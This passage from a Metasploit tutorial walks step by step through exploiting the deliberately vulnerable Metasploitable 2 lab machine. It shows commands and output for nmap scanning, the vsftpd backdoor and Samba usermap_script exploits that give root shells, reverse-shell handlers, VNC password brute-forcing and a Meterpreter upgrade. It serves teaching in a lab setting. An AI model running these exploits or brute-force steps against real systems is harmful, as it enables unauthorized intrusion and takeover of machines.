The output shows that the payload is set to (cmd/unix/reverse_ssh). Let’s set up the payload. Type in show options:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.111   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_ssh):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

The option for the payload shows that the selected payload is now changed to our desired one (cmd/unix/reverse_ssh). You can set the payload options with the set command as well:

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > set LPORT 5000
LPORT => 5000

Here, we’ve set the local port for listening to 5000 from the default 4444. Let’s see our changes in the options.

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > show options

Module options (exploit/unix/webapp/citrix_access_gateway_exec):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.111   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_ssh):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  5000             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

Now that you’ve set up the exploit and the payload – you can start the fun. Let’s move on to the exploit commands.

Check if the exploit will work or not

Before going forward with the exploit, you might wonder if it is actually going to work or not. Let’s try to find out. We’ll have to use the “check” command to see the target host is vulnerable to the exploit we’ve set up –

msf6 exploit(unix/webapp/citrix_access_gateway_exec) > check

[*] Attempting to detect if the Citrix Access Gateway is vulnerable...
[*] 192.168.43.111:443 - The target is not exploitable.

As you can see, the target we’re attacking is not vulnerable to this exploit. So there’s no point in continuing this line of attacking. In reality, you’ll mostly know if the machine has the vulnerability to the exploit you’re running beforehand. This is just an example to illustrate what is possible.

We’ll show you an example of an exploitable machine in the next section. Keep on reading!

A penetration test walkthrough

In this section, I’ll demonstrate how penetration testing is done. I will be using the intentionally vulnerable Linux machine – Metasploitable 2. This machine is created to have its port open and running vulnerable applications. You can get Metasploitable on rapid7’s website.

Go to this link and fill up the form to download. After downloading Metasploitable, you can set it up in a VirtualBox or a VMware or any software virtualization apps. If you’re using VMware workstation player, you can just load it up by double clicking the Metasploitable configuration file from the downloaded files.

Before we begin, a word of caution – Always remember that infiltrating any system without permission would be illegal. It’s better to create your own systems and practice hacking into them rather than learning to do it in real systems that might be illegal.

Target identification and Host discovery

Now we’ll be performing the first step in any penetration testing – gathering information about the target host. I’ve created the Metasploitable system inside my local area network. So, I already know the IP address of the target machine. You might want to find out IP address of the target host in your case. You can use DNS enumeration for that case. DNS enumeration is the way to find out the DNS records for a host. You can use nslookup, dig, or host command to perform DNS enumeration and get the IP address associated with a domain. If you have access to the machine, you can just find out the IP address of the machine. For checking if the host is up, you can just use the ping command or use nmap for host discovery.

In my case, I ran ifconfig command on my Metasploitable machine, and got the IP address to be 192.168.74.129. Let’s see if our attack machine can ping the victim machine:

nmap -sn 192.168.74.129

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-07 03:43 EDT
Nmap scan report for 192.168.74.129
Host is up (0.00070s latency).
MAC Address: 00:0C:29:C9:1A:44 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

It’s clear that our attack machine can reach the victim machine. Let’s move on to the next step.

Port scanning & Service detection

This is the next step in the information gathering phase. Now we’ll find out what ports are open and which services are running in our victim machine. We’ll use nmap to run the service discovery:

nmap -sV 192.168.74.129

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-07 03:47 EDT
Nmap scan report for 192.168.74.129
Host is up (0.0013s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:C9:1A:44 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds

As we can see, it’s party time for any penetration tester or hacker. There are too many ports open. The more open ports – the better the chance for one of the applications to be vulnerable. If you don’t know what we’re talking about, don’t worry. We’ve covered the scanning technique from the basics in a nmap tutorial that you can find here.

Vulnerability Analysis

Now that we’ve performed the service detection step, we know what versions of applications our victim is running. We just have to find out which one of them might be vulnerable. You can find out vulnerabilities just by googling about them, or you can also search them in your Metasploit database. Let’s do the latter, and search in Metasploit. Fire up your Metasploit console with the msfconsole command.

Let’s find out if the first application in the list, vsftpd 2.3.4 (which is an ftp service running on port 21) that we found in our service detection phase, has any exploits associated with it. Search for vsftpd in your Metasploit console:

search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Whoa! The first one is already a hit. As you can see, the exploit rank is excellent and you can execute backdoor commands with this exploit. However, you must remember that this is metasploitable you’re attacking. In real systems, you will not find a lot of backdated applications with vulnerabilities. Let’s move on and check if the other applications are vulnerable or not. Try to see if the openssh has any vulnerabilities:

search openssh

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                         ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  post/windows/manage/forward_pageant                           normal     No     Forward SSH Agent Requests To Remote Pageant
   1  post/windows/manage/install_ssh                               normal     No     Install OpenSSH for Windows
   2  post/multi/gather/ssh_creds                                   normal     No     Multi Gather OpenSSH PKI Credentials Collection
   3  auxiliary/scanner/ssh/ssh_enumusers                           normal     No     SSH Username Enumeration
   4  exploit/windows/local/unquoted_service_path  2001-10-25       excellent  Yes    Windows Unquoted Service Path Privilege Escalation


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/local/unquoted_service_path

However, this result is not so much promising. Still, we probably can brute force the system to get the login credentials. Let’s find out some more vulnerabilities before we start exploiting them. The ftp application ProFTPD 1.3.1 looks promising. Let’s search if anything is in the Metasploit database:

search proftpd

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                         ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   1  exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   3  exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   4  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   5  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor

Seems like there is no specific mention of version 1.3.1 for the ProFTPD application. However, the other versions might still work. We’ll find that out very soon.

You can research each of the open port applications and find out what vulnerabilities might be associated with them. You can definitely use google and other exploit databases as well instead of only Metasploit.

Exploiting Vulnerabilities

This is the most anticipated step of the penetration test. In this step, we’ll exploit the victim machine in all its glory. Let’s begin with the most straightforward vulnerability to exploit that we found in the previous step. It is the VSFTPD 2.3.4 backdoor command execution exploit.

Exploiting the VSFTPD vulnerability

Let’s use the exploit (exploit/unix/ftp/vsftpd_234_backdoor):

use exploit/unix/ftp/vsftpd_234_backdoor

[*] No payload configured, defaulting to cmd/unix/interact

After entering this command, you’ll see your command line will look like this:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 

This means you are using this exploit now. Let’s see the options for the exploit:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ‐‐‐‐    ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

Let’s set up the RHOSTS as the target machine’s IP address (192.168.74.129 in my case):

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129 

See the options again:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ‐‐‐‐    ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS  192.168.74.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

Now you have to specify a payload as well. Let’s see what are our options:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ‐‐‐‐                       ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

Not much of an option right? And this one is already set up in the options. You can check it yourself. There are no required values for this payload as well. Let’s check if this exploit will work or not –
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > check
 [-] Check failed: NoMethodError This module does not support check.

So, this exploit doesn’t support checking. Let’s move forward. This is the moment of truth. Let’s exploit the machine –
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.74.129:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.74.129:21 - USER: 331 Please specify the password.
[+] 192.168.74.129:21 - Backdoor service has been spawned, handling...
[+] 192.168.74.129:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.74.129:6200) at 2022-02-07 05:14:38 -0400


whoami
root

Voila! We’ve successfully exploited the machine. We got the shell access. I ran the whoami command and got the reply as root. So, we have full access to the Metasploitable machine. We can do whatever the root can – everything!

Now before we show what to do after exploitation, let’s see some other methods of exploitation as well.

Keeping the sessions in the background

First, let’s keep the session we got in the background:

Type in background within the terminal, then type y and hit enter:

whoami
root
background

Background session 2? [y/N]   y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 

You can access this session anytime using the sessions command:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  ‐‐  ‐‐‐‐  ‐‐‐‐            ‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐
  2         shell cmd/unix               0.0.0.0:0 -> 192.168.74.129:6200 (192.168.74.129)

You can get back to the session by using the “-i” flag and specifying the ID. Do the following –

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 2
[*] Starting interaction with 2...

whoami
root

Exploiting samba smb

Did you notice that the netbios-ssn service was running on Samba in our victim machine’s port 139 and 445? There might be an exploit that we could use. But before that, there was no particular version written for the samba application. However, we have an auxiliary module in Metasploit that can find out the version for us. Let’s see this in action:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > search smb_version

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   ‐  ‐‐‐‐                               ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  auxiliary/scanner/smb/smb_version                   normal  No     SMB Version Detection


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version

Now choose the smb scanner:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use 0
msf6 auxiliary(scanner/smb/smb_version) > 

Now let’s see the options we have to set up:

msf6 auxiliary(scanner/smb/smb_version) > show options

msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)

We can set up the RHOSTS and THREADS here. The RHOSTS will be our target and the THREADS determine how fast will the program run. Let’s set them up:

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 16
THREADS => 16
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS   192.168.74.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  16               yes       The number of concurrent threads (max one per host)

Now run it:

msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.74.129:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.74.129:445    -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.74.129:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output gives us the version of the Samba – 3.0.20. Now we can find out the vulnerabilities associated with it. Let’s try google. A simple google search reveals this version is vulnerable to username map script command execution.

This is also available in Metasploit. Let’s perform a search:

msf6 auxiliary(scanner/smb/smb_version) > search username map script

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  auxiliary/scanner/oracle/oracle_login                   normal     No     Oracle RDBMS Login Utility
   1  exploit/multi/samba/usermap_script     2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/samba/usermap_script

As you can see, there is an exploit for this vulnerability with an excellent rank. Let’s use this one and try to gain access to the metasploitable machine:

msf6 auxiliary(scanner/smb/smb_version) > use 1
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ‐‐‐‐    ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST  192.168.74.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Automatic

We can see that the Payload options are already set up. I will not change it. You can change the LHOST to your attack machine’s IP address. We only need to set up the RHOSTS option:

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129

Now let’s exploit:

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 192.168.74.128:4444 
[*] Command shell session 3 opened (192.168.74.128:4444 -> 192.168.74.129:45078) at 2021-06-29 06:48:33 -0400

whoami
root

As you can see the exploit sets up a reverse TCP handler to accept the incoming connection from the Victim machine. Then the exploit completes and opens a session. We can also see that the access level is root. Now let’s move on to another exploit keeping this session in the background.

Exploiting VNC

Now let’s try to exploit the VNC service running on our victim machine. If you search in Metasploit database, you will find no matching exploit for this one. This means you have to think of some other ways to get into this service. Let’s try to brute force the VNC login. We’ll be using the auxiliary scanner for vnc login:

msf6 exploit(multi/samba/usermap_script) > search scanner vnc

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ‐‐‐‐                                      ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐    ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  auxiliary/scanner/vnc/ard_root_pw                          normal  No     Apple Remote Desktop Root Vulnerability
   1  auxiliary/scanner/http/thinvnc_traversal  2019-10-16       normal  No     ThinVNC Directory Traversal
   2  auxiliary/scanner/vnc/vnc_none_auth                        normal  No     VNC Authentication None Detection
   3  auxiliary/scanner/vnc/vnc_login                            normal  No     VNC Authentication Scanner


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/vnc/vnc_login

We’ll be needing the VNC Authentication Scanner (3). Let’s select it:

msf6 exploit(multi/samba/usermap_script) > use 3
msf6 auxiliary(scanner/vnc/vnc_login) > 

We do not know what this auxiliary module does yet. Let’s find out. Remember the info command?

msf6 auxiliary(scanner/vnc/vnc_login) > info

       Name: VNC Authentication Scanner
     Module: auxiliary/scanner/vnc/vnc_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  carstein <carstein.sec@gmail.com>
  jduck <jduck@metasploit.com>

Check supported:
  No

Basic options:
  Name              Current Setting                                                   Required  Description
  ‐‐‐‐              ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐                                                   ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
  BLANK_PASSWORDS   false                                                             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                 yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                             no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                             no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                             no        Add all users in the current database to the list
  PASSWORD                                                                            no        The password to test
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt  no        File containing passwords, one per line
  Proxies                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT             5900                                                              yes       The target port (TCP)
  STOP_ON_SUCCESS   false                                                             yes       Stop guessing when a credential works for a host
  THREADS           1                                                                 yes       The number of concurrent threads (max one per host)
  USERNAME          <BLANK>                                                           no        A specific username to authenticate as
  USERPASS_FILE                                                                       no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                             no        Try the username as the password for all users
  USER_FILE                                                                           no        File containing usernames, one per line
  VERBOSE           true                                                              yes       Whether to print output for all attempts 
Description:
  This module will test a VNC server on a range of machines and report 
  successful logins. Currently it supports RFB protocol version 3.3, 
  3.7, 3.8 and 4.001 using the VNC challenge response authentication 
  method.

References:
  https://nvd.nist.gov/vuln/detail/CVE-1999-0506

We can see the options this module will take. The description is also there. From the description, it becomes clear that this is a module that will try brute-forcing. Another conspicuous fact is that this module supports RFB protocol version 3.3, which is written in our discovered VNC service (protocol 3.3). If you’re wondering why this is related – VNC service uses RFB protocol. So this module is compatible with the VNC service in our victim machine. Let’s move forward with this.

We’ve already seen the options this module will take from the “info” command. The options marked in yellow are the important ones. Not all of them are required though. We can see the default password file (PASS_FILE) for the brute force will be (/usr/share/Metasploit-framework/data/wordlists/vnc_passwords.txt). We’ll not be changing this file. You might want to change this one if you’re doing real world tests that are not Metasploitable. We have to define RHOSTS. Let’s turn on STOP_ON_SUCCESS as well, which will stop the attack once the correct credentials are found. We’ll also increase the THREADS for faster operation, and set USER_AS_PASS to true, which will use the same username and password as well. Let’s set these up:

msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf6 auxiliary(scanner/vnc/vnc_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/vnc/vnc_login) > set THREADS 32
THREADS => 32
msf6 auxiliary(scanner/vnc/vnc_login) > set USER_AS_PASS true
USER_AS_PASS => true

Now you can start running the brute force:

msf6 auxiliary(scanner/vnc/vnc_login) > run

[*] 192.168.74.129:5900   - 192.168.74.129:5900 - Starting VNC login sweep
[!] 192.168.74.129:5900   - No active DB -- Credential data will not be saved!
[-] 192.168.74.129:5900   - 192.168.74.129:5900 - LOGIN FAILED: :<BLANK> (Incorrect: Authentication failed)
[+] 192.168.74.129:5900   - 192.168.74.129:5900 - Login Successful: :password

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The brute force attempt was successful. We can see the username:password pair as well. There is no username set up here, and the password is just password. In real systems, most of the time the password will not be this simple. However, now you know how you can brute force the VNC authentication.

Now let’s try to login to the VNC with our cracked credentials. I’ll use the vncviewer command followed by the IP address of the victim machine:

msf6 auxiliary(scanner/vnc/vnc_login) > vncviewer 192.168.74.129
[*] exec: vncviewer 192.168.74.129

Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:

At this point, you’ll have to provide the password. Type in password and you’ll get in:

msf6 auxiliary(scanner/vnc/vnc_login) > vncviewer 192.168.74.129
[*] exec: vncviewer 192.168.74.129

Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Do you want to see the GUI version of the Metasploitable that we cracked just now? Here’s the view from the TightVNC application.

This is beautiful. Now you can pretty much do anything you desire. Now that we’ve shown you 3 ways you can exploit the Metasploitable with the Metasploit Framework, it’s time to show you the things you might have to do once you’ve gained access.

Post Exploitation tasks with Metasploit & Meterpreter

One of the tasks you might do after exploiting is keeping the session in the background while you work on the Metasploit Framework. We’ve already shown you how to do that in the previous section. However, if you exit from the session then that opened session will be gone.

You will need to exploit the machine once again to get another session. The same thing will happen if the victim chooses to reboot the machine. In this section, we’ll show you how to keep your access even if the victim reboots his/her machine.

One of the most useful tools after exploiting a target is the Meterpreter shell. It has many custom functionalities built into it that you don’t need to make a program or install any software to do.

What is Meterpreter?

Meterpreter is a Metasploit payload that gives an interactive shell that attackers may use and execute code on the victim system. It uses in-memory DLL injection to deploy. This allows Meterpreter to be fully deployed in the memory and it does not write anything to the disk. There are no new processes as Meterpreter gets injected into the affected process. It may also move to other operating processes. The forensic footprint of Meterpreter is therefore very small.

Upgrade to a meterpreter from shell

Meterpreter is an advanced payload for Metasploit that offers lots of functions after exploiting a system. But if you noticed, we didn’t get any meterpreter sessions from the exploits.

In fact, the exploits did not have an option to set meterpreter as a payload. Let’s learn how to upgrade to meterpreter from a shell. Let’s see the sessions we have at first using the sessions command:

msf6 auxiliary(scanner/vnc/vnc_login) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  ‐‐  ‐‐‐‐  ‐‐‐‐            ‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐
  2         shell cmd/unix               0.0.0.0:0 -> 192.168.74.129:6200 (192.168.74.129)
  4         shell cmd/unix               192.168.74.128:4444 -> 192.168.74.129:33209 (192.168.74.129)

As you can see, we have two sessions now with id 2 and 4. Both of these sessions are of unix cmd shell type. Now let’s try to upgrade to meterpreter. For this purpose, we’ll be using the shell to meterpreter exploit:

msf6 auxiliary(scanner/vnc/vnc_login) > search shell to meterpreter upgrade

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   ‐  ‐‐‐‐                                          ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  post/multi/manage/shell_to_meterpreter                         normal     No     Shell to Meterpreter Upgrade
   1  exploit/windows/local/powershell_cmd_upgrade  1999-01-01       excellent  No     Windows Command Shell Upgrade (Powershell)


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/powershell_cmd_upgrade

Let’s use the first one:

msf6 auxiliary(scanner/vnc/vnc_login) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ‐‐‐‐     ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Now we have to specify the options. Remember the IDs of the sessions? Let’s try to upgrade the session ID 4:

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 4
SESSION => 4

Now exploit:

msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 4
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.74.128:4433 
[*] Sending stage (984904 bytes) to 192.168.74.129
[*] Meterpreter session 6 opened (192.168.74.128:4433 -> 192.168.74.129:46735) at 2022-02-07 10:08:39 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed

This exploit might not work properly the first time. Keep on trying again until it works. Now let’s look at the sessions again:

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  2         shell cmd/unix                                                                                           0.0.0.0:0 -> 192.168.74.129:6200 (192.168.74.129)
  4         shell cmd/unix                                                                                           192.168.74.128:4444 -> 192.168.74.129:33209 (192.168.74.129)
  6         meterpreter x86/linux  root @ metasploitable (uid=0, gid=0, euid=0, egid=0) @ metasploitable.localdo...  192.168.74.128:4433 -> 192.168.74.129:46735 (192.168.74.129)

